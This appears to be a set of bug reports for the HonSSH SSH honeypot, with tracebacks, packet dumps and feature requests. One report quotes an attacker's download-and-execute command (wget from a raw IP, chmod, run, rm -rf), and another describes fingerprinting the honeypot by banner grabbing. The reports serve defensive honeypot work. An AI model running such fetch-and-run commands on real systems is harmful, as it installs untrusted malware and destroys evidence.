on 30 Mar 2014 at 5:34
Starting honssh in background...2013-09-30 21:36:52+0800 [-] Log opened.
2013-09-30 21:36:52+0800 [-] Traceback (most recent call last):
2013-09-30 21:36:52+0800 [-] File
"/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in
getApplication
2013-09-30 21:36:52+0800 [-] application =
service.loadApplication(filename, style, passphrase)
2013-09-30 21:36:52+0800 [-] File
"/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in
loadApplication
2013-09-30 21:36:52+0800 [-] application = sob.loadValueFromFile(filename,
'application', passphrase)
2013-09-30 21:36:52+0800 [-] File
"/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 210, in
loadValueFromFile
2013-09-30 21:36:52+0800 [-] exec fileObj in d, d
2013-09-30 21:36:52+0800 [-] File "honssh.tac", line 53, in <module>
2013-09-30 21:36:52+0800 [-] with open(cfg.get('honeypot', 'private_key'))
as privateBlobFile:
2013-09-30 21:36:52+0800 [-] IOError: [Errno 2] No such file or directory:
'id_rsa'
2013-09-30 21:36:52+0800 [-] Failed to load application: [Errno 2] No such file
or directory: 'id_rsa'
2013-09-30 21:36:52+0800 [-] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 652, in run
runApp(config)
File "/usr/lib/python2.7/dist-packages/twisted/scripts/twistd.py", line 23, in runApp
_SomeApplicationRunner(config).run()
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 386, in run
self.application = self.createOrGetApplication()
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 451, in createOrGetApplication
application = getApplication(self.config, passphrase)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 462, in getApplication
application = service.loadApplication(filename, style, passphrase)
File "/usr/lib/python2.7/dist-packages/twisted/application/service.py", line 405, in loadApplication
application = sob.loadValueFromFile(filename, 'application', passphrase)
File "/usr/lib/python2.7/dist-packages/twisted/persisted/sob.py", line 210, in loadValueFromFile
exec fileObj in d, d
File "honssh.tac", line 53, in <module>
with open(cfg.get('honeypot', 'private_key')) as privateBlobFile:
exceptions.IOError: [Errno 2] No such file or directory: 'id_rsa'
Failed to load application: [Errno 2] No such file or directory: 'id_rsa'
in ubuntu 12.04
Original issue reported on code.google.com by [email protected]
on 30 Sep 2013 at 1:37
What steps will reproduce the problem?
Not sure, during the lat 10 -11 days ive only seen this happen twice.
What is the expected output?
Normal log entries(?)
What do you see instead?
2014-03-12 05:26:37+0100 [HonsshServerTransport,1376,pesky.ip.add.ress]
Unhandled Error
Traceback (most recent call last):
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 581, in _doReadOrWrite
why = selectable.doRead()
File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 199, in doRead
rval = self.protocol.dataReceived(data)
File "/usr/local/lib/python2.7/site-packages/twisted/conch/ssh/transport.py", line 438, in dataReceived
self.dispatchMessage(messageNum, packet[1:])
File "/HONEY/honssh/server.py", line 201, in dispatchMessage
self.client.sendPacket(messageNum, payload)
exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'
2014-03-12 05:26:37+0100 [HonsshServerTransport,1376,pesky.ip.add.ress]
connection lost
What version of the product are you using?
b9880b4e367b
On what operating system?
OpenBSD 5.4
Please provide any additional information below.
Totally forgot to enable advanced logging, doing that now and including it if
it happens again :)
Original issue reported on code.google.com by [email protected]
on 12 Mar 2014 at 6:48
What steps will reproduce the problem?
It looks like its possible to fingerprint HonSSH trough banner grabbing.
What is the expected output?
$ nc -v blacks.sshserver.com 22
Connection to blacks.sshserver.com 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.3
What do you see instead?
$ nc -v blacks.trollpot.com 22
Connection to blacks.trollpot.com 22 port [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_6.3
๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ;๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝ๏ฟฝG@;๏ฟฝ$๏ฟฝ๏ฟฝdiffie-hellman-group1-sha1ssh-rsa๏ฟฝaes
256-ctr,aes256-cbc,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,cast128-ctr,cast1
28-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cbc๏ฟฝaes256-ctr,aes256-cbc,aes19
2-ctr,aes192-cbc,aes128-ctr,aes128-cbc,cast128-ctr,cast128-cbc,blowfish-ctr,blow
fish-cbc,3des-ctr,3des-cbc๏ฟฝhmac-sha1,hmac-md5๏ฟฝhmac-sha1,hmac-md5none,zlib none,z
libA(&
What version of the product are you using?
b9880b4e367b
On what operating system?
All of them i guess?
Please provide any additional information below.
It looks to me that HonSSH is using the version string (ssh debig level 1)
as well as the kex_parse_kexinit (ssh debug level 2). Is it possible to
make HonSSH be less verbose/prevent it from dumping too much information?
Cheers,
B
Original issue reported on code.google.com by [email protected]
on 16 Mar 2014 at 4:40
What steps will reproduce the problem?
1. The attacker logs in and downloads a file.
What is the expected behavior?
All files that's downloaded to the honeypot are also downloaded by HonSSH
What do you see instead?
Only some files are downloaded, others are not.
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4
Please provide any additional information below.
This is the first time i've noticed this. Two files were downloaded to the
honeypot today, the only difference i can see between the two download events
is the port the attacker connects to on the malware hosting server.
HTTP on port 6666 in this case. If this is the case its not consistent either
as HonSSH has managed to do this before.
Adding log, adv-log and tty. Enjoy! :)
Original issue reported on code.google.com by [email protected]
on 26 Mar 2014 at 10:32
Attachments:
What steps will reproduce the problem?
And so...it returns :)
What is the expected output?
Normal log entries(?)
What do you see instead?
2014-03-21 12:41:37+0100 [honssh.server.HonsshServerFactory] Starting factory
<honssh.client.HonsshClientFactory instance at 0x1fcbd4d5998>
2014-03-21 12:41:37+0100 [HonsshServerTransport,218,193.17.184.197] Unhandled
Error
Traceback (most recent call last):
File "/usr/local/lib/python2.7/site-packages/twisted/application/app.py", line 323, in runReactorWithLogging
reactor.run()
File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/local/lib/python2.7/site-packages/twisted/internet/base.py", line 1181, in mainLoop
self.doIteration(t)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/pollreactor.py", line 167, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/local/lib/python2.7/site-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 594, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.readConnectionLost(f)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 257, in readConnectionLost
self.connectionLost(reason)
File "/usr/local/lib/python2.7/site-packages/twisted/internet/tcp.py", line 277, in connectionLost
protocol.connectionLost(reason)
File "/HONEY/honssh/server.py", line 73, in connectionLost
self.client.loseConnection()
exceptions.AttributeError: HonsshServerTransport instance has no attribute 'client'
2014-03-21 12:41:37+0100 [Uninitialized] New client connection
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] kex alg, key alg:
diffie-hellman-group-exchange-sha1 ssh-rsa
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] outgoing: aes256-ctr
hmac-sha1 none
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] incoming: aes256-ctr
hmac-sha1 none
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] REVERSE
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] NEW KEYS
2014-03-21 12:41:37+0100 [HonsshClientTransport,client] Client Connection
Secured
2014-03-21 12:42:37+0100 [HonsshClientTransport,client] connection lost
2014-03-21 12:42:37+0100 [HonsshClientTransport,client] Stopping factory
<honssh.client.HonsshClientFactory instance at 0x1fcbd4d5998>
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3/5.4 amd64
Please provide any additional information below
I have advanced logging enabled this time, but this incident did not generate
any logs at all.
The log snippet i included here is the only data i can provide you with - sorry.
Original issue reported on code.google.com by [email protected]
on 21 Mar 2014 at 11:58
What steps will reproduce the problem?
Not sure what causes this issue or if its working as intended, but i've noticed
this showing up in a lot of session logs lately.
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: CLIENT 100 - '\x00\x00\x01\x00'
What version of the product are you using? On what operating system?
b9880b4e367b
Original issue reported on code.google.com by [email protected]
on 10 Mar 2014 at 10:34
Got some unknown SSH-Packages tonight:
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 2 -
'\x00\x00\x00\xb0\x8d6\xa9\x91\xd5\xd8\x15\xbfP\x1a\xab\x10\x01\xaaR\xf5\x88\xb1
\xb6\x11\xce\x8d\xbe\x12\xcb\x03\'/\xe7R;\xca\x8e\xbcf\x9a\xfa\xb9\xdf\x84G%\x83
\x14\x16\x9c\x95\xdf\xae\'\xdf\x15\x99\xc6\x0f]\xc6.\xf2q\xcd!\'\x12ju\xea*~\x95
\xf0\xfe\xe0\x9c\xacm\xe5\x08(\t\xd6\x1al&\xef\xa2\x120\x01\xe0\x1c\xf4\xc8k3\'\
xfe\x82br\x95!I\xcb\xe7\x99\xc5%L\xb9.\xc4\xf2"q\xb0\xea+\xc4F\xcf\xef\xb3\x1b\x
e9\x0fTe\xc5\xac\xdeH\xe2\x122\x08+\xbd5\xf3c7\x05\x96Hk\xe9|\xf6\x9a\x0fx\x1b\x
94\ta\x0eD\xb4\x97\xc1\xd8\xbf}i\xa1E1\xbf\xb0\xc2\x8fe\xa6\xc6\x19'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 20 -
'7\xee\xd5yVn\x8cD\xf9\xb6\xe0\x8b\xf5\xec[\xb5\x00\x00\x00\x9adiffie-hellman-gr
oup-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sh
a1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1\x00\x00\x00\x0fssh-rsa
,ssh-dss\x00\x00\x00\x9faes256-ctr,aes256-cbc,[email protected],aes192
-ctr,aes192-cbc,aes128-ctr,aes128-cbc,blowfish-ctr,blowfish-cbc,3des-ctr,3des-cb
c,arcfour256,arcfour128\x00\x00\x00\x9faes256-ctr,aes256-cbc,rijndael-cbc@lysato
r.liu.se,aes192-ctr,aes192-cbc,aes128-ctr,aes128-cbc,blowfish-ctr,blowfish-cbc,3
des-ctr,3des-cbc,arcfour256,arcfour128\x00\x00\x00-hmac-sha2-256,hmac-sha1,hmac-
sha1-96,hmac-md5\x00\x00\x00-hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5\x00\x
00\x00\x1anone,zlib,[email protected]\x00\x00\x00\x1anone,zlib,[email protected]\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 20 -
'\xf6`\xb8\xec\xc2\xa7\x854\x91\xa3\xd2\xfb\x07\\\xbc\x9b\x00\x00\x00\xb7ecdh-sh
a2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-
sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hel
lman-group1-sha1\x00\x00\x00#ssh-rsa,ssh-dss,ecdsa-sha2-nistp256\x00\x00\x00\x9d
aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc,blowf
ish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,[email protected]\x0
0\x00\x00\x9daes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3
des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysa
tor.liu.se\x00\x00\x00\xa7hmac-md5,hmac-sha1,[email protected],hmac-sha2-256,h
mac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripemd160,hmac-ripemd160@ope
nssh.com,hmac-sha1-96,hmac-md5-96\x00\x00\x00\xa7hmac-md5,hmac-sha1,umac-64@open
ssh.com,hmac-sha2-256,hmac-sha2-256-96,hmac-sha2-512,hmac-sha2-512-96,hmac-ripem
d160,[email protected],hmac-sha1-96,hmac-md5-96\x00\x00\x00\x15none,zli
[email protected]\x00\x00\x00\x15none,[email protected]\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x00'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 30 - '\x00\x00\x10\x00'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 31 - "\x00\x00\x02\x01\x00\xf5\xd3\x84\x9d
\x92\xfdB{N\xbd\x83\x8e\xa4\x83\x03\x97\xa5_\x80\xb6Dbc
\xdb\xbeQ\xe8\xf6>\xd8\x81H\xd7\x87\xc9N~g\xe4\xf3\x93\xf2lV^\x19\x92\xb0\xcf\xf
8\xa4z\x9549F*M\x0f\xfaWc\xef`\xff\x90\x8f\x8e\xe6\xc4\xf6\xef\x9f2\xb9\xbaP\xf0
\x1a\xd5o\xe7\xeb\xe9\x08v\xa5\xcfa\x81:J\xd4\xba~\xc0pC\x03\xc9\xbf\x88}6\xab\x
bdl*\xa9T_\xc2&22\x92~s\x10`\xf5\xc7\x01\xc9m\xc3@\x16cm\xf48\xce0\x977\x15\xf1!
\xd7g\xcf\xb9\x8b]\t\xae{\x86\xfa6\xa0Q\xad<)A\xa2\x95\xa6\x8e/X:V\xbci\x91>\xc9
\xd2Z\xbe\xf4\xfd\xf1\xe3\x1e\xde\x82z\x02b\r\xb0X\xb9\xf0A\xda\x05\x1c\x8c\x0f\
x13\xb12\xc1|\xeb\x89?\xa7\xc4\xcd\x8d\x8f\xee\xbd\x82\xc5\xf9\x12\x0c\xb2!\xb8\
xe8\x8c_\xe4\xdc\x17\xca\x02\nST\x84\xc9,}K\xeei\xc7p>\x1f\xa9\xa6R\xd4D\xc8\x00
e4,n\xc0\xfa\xc2<$\xde$n=\xeer\xca\x8b\xc8\xbe\xcc\xda\xde+6w\x1e\xfc\xc3PU\x82h
\xf55*\xe5?/q\xdbb$\x9a\xd9\xacO\xab\xddm\xfb\t\x9cl\xff\x8c\x05\xbd\xea\x89C\x9
0\xf9\x86\x0f\x01\x1c\xca\x04m\xfe\xb2\xf6\xef\x81\tNy\x80\xbeRgBpm\x1f=\xb9
\xdb\x10t\t)\x1b\xb4\xc1\x1f\x9a}\xcb\xfa\xf2m\x80\x8eo\x9f\xe66\xb2k\x93\x9d\xe
4\x19\x12\x9e\x86\xb1\xe62\xc6\x0e\xc2;e\xc8\x15r<]\x86\x1a\xf0h\xfd\n\xc8\xb3\x
7fL\x06\xec\xbd\\\xb2\xef\x06\x9c\xa8\xda\xac\\\xbdg\xc6\x18*e\xfe\xd6V\xd0\xdf\
xbb\xb8\xa40\xb1\xdb\xac{\xd60;\xec\x8d\xe0x\xfei\xf4C\xa7\xbc\x811\xa2\x84\xd2]
\xc2\x84O\tb@\xbf\xc6\x1bb\xe9\x1a\x87\x80)\x87e\x9b\x88L\tLht\x1d)\xaa\\\xa1\x9
b\x94W\xe1\xf9\xdfa\xc7\xdb\xbb\x13\xa6\x1ay\xe4g\x0b\x08`'\xf2\r\xa2\xafO[\x02\
x07%\xf8\x82\x87&7\x9fB\x91x\x92j$Kj\x0f\x00\x00\x00\x01\x05"
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 32 -
'\x00\x00\x02\x01\x00\xcc\xad\xaf(\xa7\xe8\xbbV4\xe4N\xd3\x15\xdfsG,\x04\x01\xc1
\xf3y\xcd\x9b\xf4m\xe8S\x03\xac\x9c!/\xe89\xe1\xcc\x86\x0fj\xbe\x04\x0c\xb6\n\x8
7\xc9\xf1<P[\xd1\x07L\xce\xc1_\x18\x0bO\xc8p\t\x9c\x99&~\xa8*\x9dG\x8aa\xe9\xa7%
gI\x9fMt\xbf\xb8QP\xab\\\xbf\x0eD\x91a0\xad\xee\xe6\xf19\xa5E\xc3\xb7H\xfd`o>^\x
02\xf0\x92G\xe2:\x19\xeb\xd6\xc2\x1b\xfd\xaa\xa2\xb8\x85\xa3\xce\xda
\xf9oI\x02Ne\x8b\xfe\x16\x97.\xe6\xc4\xfb\xd8\x81\xdf\xb0\xb2`\\\xd8\xf28\x14\xe
5\n\x14\xe4LZk\xaa`\xb6E\xbc\xa0Q\x95\rgSl"\x80\x86(\xfcK\xb7b\xccD\xf3\r#\xbaV\
x1b\xe0\nx{\xc6nmH\x02b\x9f\xe4\xba\xaa\x05\xae\xd0\xca
\x9d\xcd\xc5\x84\xfc\xa9\n??\xce\x1f\x8c\xc5\x1d\x90\x8e\x88g^Q\x99\x12\x04L\x98
\xfbY=\xb4|U\xd9\xf9\x80\x99\xe4\x1d\xcaq\x98\xa4\xcc\xbf%\x13\x03\t\x96;\xb7\xf
0\xf5k#u\xb5^\xc7\xc1\x94\x84\xb8\xf2\xb0\xbd\xd4jl1\xear\xef<\xb3\xcc\x0b\n\x91
\xb3\xbf\xe7*cD*\x16\xb8\x913\x9d=*\xb4.\xb0\xe1\xceI[\x80\xbd\rZ\xe53\x92\xdb\x
d0\xf6\xec\xb0\xfa1\x0b\n\x8b\xfa\xee<K\xf3\x98\xfd\x90\xfb\x8a\xd8u\xa5\xee3g\x
14\xa7\x8f\xad\xf1\xe0\x89Y\x8eG\xe9\xc7\x1f\x14\x92\xcc\xd5\x95\x90\x9e\x06Wy\x
07\x1e\x95\r\t\x0c\xb3\r\x7f\xb4\xa5\xe0\xc9\xee,q\x98\x1d}@\xe24\xac\x8d\x7f@-6
\x17\xdc\x8b\xad\xe0\xe3\xf2T\xa9b\xc3\x82\xee\x1c\xd7\xcdD\xc1dn\xad\x10\x15\xb
02c\x1aR\x97\x0e\xad\x82\x9b\xb1r\xb9\xdd\xce\x86\xd5\xf1\xdd\r\x07\x9f\xd3v\x89
\x1a\xac\xa0d\x01}\'\x95\x93\x03\t[N\x94U\xc6!\xf5\xd2y\x92:8*[\x06\xf2M\xd3<k}\
xfb\xdc\x801\xa1
\xd6\x99\x03\xe1\xf2\xf3wYA\xedS\\\xb7m\x060\xe2\xa3M\x04\xdb\xc4\xa1\x00UZ%;\xd
ejy\x888_5-'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 33 -
'\x00\x00\x01\x17\x00\x00\x00\x07ssh-rsa\x00\x00\x00\x03\x01\x00\x01\x00\x00\x01
\x01\x00\xb7\xfd}p\xe5j\xba-I\xdcX\xa3\xd8\x8a\xaa\xe4\xc1Z\xcf\xab{\xce\xe3r\xd
6\x88\x128\xd5\x8f\xa9\xd9\x12\x8a!z\xec\xd0\xaa\xf2\x00\x08\xa7\x911r\xe4R\xee\
xa4\xcd\xe5f\xe0\xde\xf6\xc7]\xd7(\x14D8\x86\xb6\xe1\xec\xca\xd3\xd1\xcd\'xu%Q\x
afF\x10\xf6\x1a\x12\xdb\xbbVw\xc9\xce\x93I\xf9^\xbfN\x95\x11>`V\xdb\x04a\x18Uw%I
\x11\x84\x141V2\x13Y\xe5)\xa9G\xfe\x88g@*\x96\x9cs\xdf\x03\xca\x02\xba\xd4\x19{\
xfb\xda\x9d\xbb~\x16\x19\xa7\x04\xc2\xe62>\x08\xc4L\xe8\x11x\xf0GT\x9c\xdd\x9c\x
f5~\r\x00(c\xd1\x1f\x07\xf0d\x9e\x04e\xfc\x94\xb2\xca\x89A\xf1$N\t\xbd\xa6\x1e\x
88
\xdf3v_\x8d\xf85cs\xaf\xc1\xc3J3\x1b\xc1\xb0//>\xd7!\xed\xaf\xc5\xb3?\xed\xf6\x0
f\xe0&\xa3E\x0cI\xc5}Y\xb47\xa3\xa2C:\x7f\x0fU,\x1b\xe9\xad@\x07RDG\xaf}Z\xda[\x
cd\x92\x18\xa1\xb7\x00\x00\x02\x01\x00\xc9
\xa6D\xb3\x8a\xd4\xc4Bx\xc5"f\x8d\x82\x95\xb4\xd5\xfe&R\xed\xa2\x00:O\x9c\xed\xc
5pz\x93\xe9\xdev\xf9\xcd\xe3\x91\x1f\xf7}\xb3\xf6\x07a\x19\xa3\xef\xe1\xf5\x8e\x
c5\r\x079a\x83\xe5\x95v\xf9+]\xd2\x9b-N\xed\x9a\x98_\x96f\xc7\x9f\xd8l3\xd8\x07
i\xd6w3Z\xc8\x8d\xdc\xe9\xd2\xeb\x8d\x97!\x80\x1d\xa5\x8e\'\x06\xe7\xad\xaenC\xf
f\xec\x8b\x8dv)x/\xe0\xef\xab\x9e\xdb\x18\xc0\x93X!w\xc5\xb7p\x84\\\x12\xd0\x97\
x9d\x06Q\x80\xf8+\xcb\xfd\x9f\xeb\xd7\x97\'\x9f\xaf\xe5\xd0!\x0b\xb6\xef\x18\xbe
\xe5\x12\x86\xcb\xd3\xffH\x8f\xbd\x8a\xb8\xbc\x13\x87Sd\xc3\xee\xd7l:\xab\xc6\xa
8\xbe\xa5:\x9e\x84[`1\xac"\x16\xe5\xe7U@\x93\x0b/\xe7\xdaz5E\x92\x96\x7f\xc6E+RP
\xbb%\xf7\xee\x17\x11\xca\xab\x9e\xba\xcb0\x1d=\xe3\x9c\xc7\xc7\xf9\x0fw\x9d\x02
\xff\x9a(\xef\xf4a3k\x1e:\xaa\x17\xe2\xaf\x04o\xdd\xf0\xffS\xc1\x85\xdd\xa6\xb9H
_\x14\t\xf4\x1d\x17\x9f\xc5\xe1\xa4kaM\xdci\xc16[w\xf3-\xa0\xfa\x8c\xbc)q}\x1fM$
U\x04N\xce\xd5\xa0\xda\x0b\xfc\xd7\x0e\xf7\xf7\xb6\'\xd2\xdaM]C\x0e[\xbe\xfe\xa4
@\x14Q\x80\xb9p\x95bD\xee\x18CI\xd9E\xa6\xd3^\xa6\xe5\xc16Y\xd0N\xf2\x0b&u\xd4\x
d9\xf5\x16\xab]\x96\xd3\xe4Z,\xa7\x8a\xdb\xefk\xab\x0e\xfek\xb5\xebR\xda~\x83\x8
b\xaeH\x94\xfe\x1f\xd6\xa6\xae\xaf\xd2-\xd8\xb9h,Sx\xdc\x0e\x19\xe3\xfc\xd7\\\x0
6\xc8\xc3\xdb\t\x1d\x9e\xe8W\xb1\xfc\r\xf1\xd7\x8cc?\x81\xa5\xac\xed\xd5\xb1\xc6
\xe9:\xec\xf3\x04\x94/\xd8\xb8\'k}\xd7e\x90\xed\xf6\xf6\xab\xbfQ\xce\x9c\x87\x9e
\x14q\xa6\xc6\xb9@\xcaP\xc2\xc8\xf7\x15\x18o\x1d\x9a=\x0e\x13\x0fIF\x8aut\xa2\xb
9\xa2\xf5g:5\xcd\xcf\x10\x84\x93P\xc4B\xd1n\xfc:b\x85\x17\xe3M:\xdc\xa8\x928\xd5
\xa8\x8bZ\xb0\xb1S\xbc\xafw\xf87\x00\x00\x01\x0f\x00\x00\x00\x07ssh-rsa\x00\x00\
x01\x00\x17H\x95\xf4\xe3{)\xa5@\xf1\xa6\x95\xa4\xbbY\xb6\x90\x88\xad\xe8\xfa\x7f
&\x1c\x92\x93\x8f\xf6\x8c\x88\x1a\x07\xd0!\x04~\xf9~\xed\x07\xfe\\@\xce[\xe9{Y\x
c5$\x0f9|\xddR
\xbf\xbc\x08\x1a\xb0\xac\xa4\xc5\xf6\xe2\x00+r\x06\x05\x19i\xb9\xb6\xb6\xb1!K\x0
2\xa5\xa1\xe4\xea\t\xab\xcd\xae\n#\xfc\xe7\xf4\x11^\x88\xe6\x086Zc,\xbd\xff\xba;
FS\xb81\xa1\xb6\xc9\xc7\xd5\xf1\r\xf9+^\x023J\x93\xc5f\xcay/&\xe3\x96\xcb6\x80\x
9c\x1cqUFA\x0b2\x8d\x93\xcb\xeb\n\x18\xb3l\xf6
\xbf\xd42_b\x8eI`/I`FCOZ\xfb\xb8\xda\x95\x10\x93M\xdd\x1c\xc4\xa9\x8e\xe7\xdd\xa
a\xa3\x9br\x82\x02i##\xacfX\x18:lj5\x1b\xedV}J\x9d\xa2\x0c.\xbe\xab\xed\x1ay\xbb
D]\x91\x8f\x99\x8ew\xbcc\x1c\x97Z\xc2L\x0fW\x15F\xd5\x01
\xe5\x92\x89`\xa5\xce\x82\xeek@\xe2\xb5\x9bH(\x1c\xc4\xe1\x93\xf6\x8f'
Unknown SSH Packet detected - Please raise a HonSSH issue on google code with
the details: 21 - ''
Original issue reported on code.google.com by [email protected]
on 2 Mar 2014 at 10:46
What steps will reproduce the problem?
1.
The attacker logs in to verify the user/passwd combination and disconnects
immediately. (Possibly ctrl+d)
What is the expected behavior?
When HonSSH detects a new TTY log it should be sent using the mail function.
What behavior do you see instead?
The absence of these logs being sent.
What version of the product are you using?
56dfab7e24f1
On what operating system?
OpenBSD 5.3 amd64/5.4 amd64
Please provide any additional information below.
Dont know if this is working as intended.
Its not really a big issue whether or not i receive empty TTY logs :)
It looks to be working as long as the attacker enters at least one command.
Cheers,
B
Original issue reported on code.google.com by [email protected]
on 19 Mar 2014 at 5:49
Attachments:
If the attacker logon to the honeypot and downloads a file using a "copy paste
command" containing semicolon directly after the file name it will not be
downloaded by HonSSH
Example command:
wget http://1.2.3.4/FILENAME;chmod 777 FILENAME;./FILENAME;rm -rf FILENAME;
What version of the product are you using?
81dafaef5630
On what operating system?
Ubuntu 12.04 LTS
Original issue reported on code.google.com by [email protected]
on 17 Feb 2014 at 5:27
What steps will reproduce the problem?
1. When.
During a failed bruteforce attack
2. How to reproduce.
Attempt to login with wrong credentials
What is the expected output?
A honssh.log without any error messages.
What do you see instead?
After the attacker has failed to authenticate and disconnects, you will see
this error in the honssh.log:
"""
2014-06-03 12:13:35+0200 [HonsshServerTransport,1,1.2.3.4] [OUTPUT] Lost
connection with the attacker: 1.2.3.4
2014-06-03 12:13:35+0200 [HonsshServerTransport,1,1.2.3.4] Unhandled Error
Traceback (most recent call last):
File "/usr/lib/python2.7/dist-packages/twisted/application/app.py", line 323, in runReactorWithLogging
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1169, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1181, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/pollreactor.py", line 167, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "/usr/lib/python2.7/dist-packages/twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 599, in _doReadOrWrite
self._disconnectSelectable(selectable, why, inRead)
File "/usr/lib/python2.7/dist-packages/twisted/internet/posixbase.py", line 260, in _disconnectSelectable
selectable.readConnectionLost(f)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 257, in readConnectionLost
self.connectionLost(reason)
File "/usr/lib/python2.7/dist-packages/twisted/internet/tcp.py", line 277, in connectionLost
protocol.connectionLost(reason)
File "/opt/honssh/honssh/server.py", line 82, in connectionLost
self.out.connectionLost()
File "/opt/honssh/honssh/output.py", line 82, in connectionLost
self.email('HonSSH - Attack logged', self.txtlog_file)
File "/opt/honssh/honssh/output.py", line 241, in email
fp = open(self.txtlog_file, 'rb')
exceptions.IOError: [Errno 2] No such file or directory: 'sessions/1.2.3.4/20140603_121316.log'
2014-06-03 12:13:35+0200 [HonsshClientTransport,client] connection lost
"""
What version of the product are you using?
26d635886db9
On what operating system?
Ubuntu 12.04 LTS
Please provide any additional information below.
I remember we spoke about changing the logs that were generated, could it be
that 'sessions/1.2.3.4/20140603_121316.log' is a non-existing log file name?
Original issue reported on code.google.com by [email protected]
on 3 Jun 2014 at 10:23
HonSSH is already registering the downloaded files in the honssh.log.
Its not a great inconvenience doing some scripted taks to extract them from
those files, but it would be awesome to get them in a separate log file if
possible.
Maybe the log could have a format like this or similar?
2014-06-01 20:51:32, http://1.1.1.1/bacdoor, Size: 251Kb, MD5 hash:
42d1eea045ed9a267041a64d2f4f1b53, sessions/2.3.4.5/downloads/bacdoor
This would also help with submitting the hash to virustotal abd also seeing if
the attackers pull the same versions of malware.
Original issue reported on code.google.com by [email protected]
on 1 Jun 2014 at 7:01
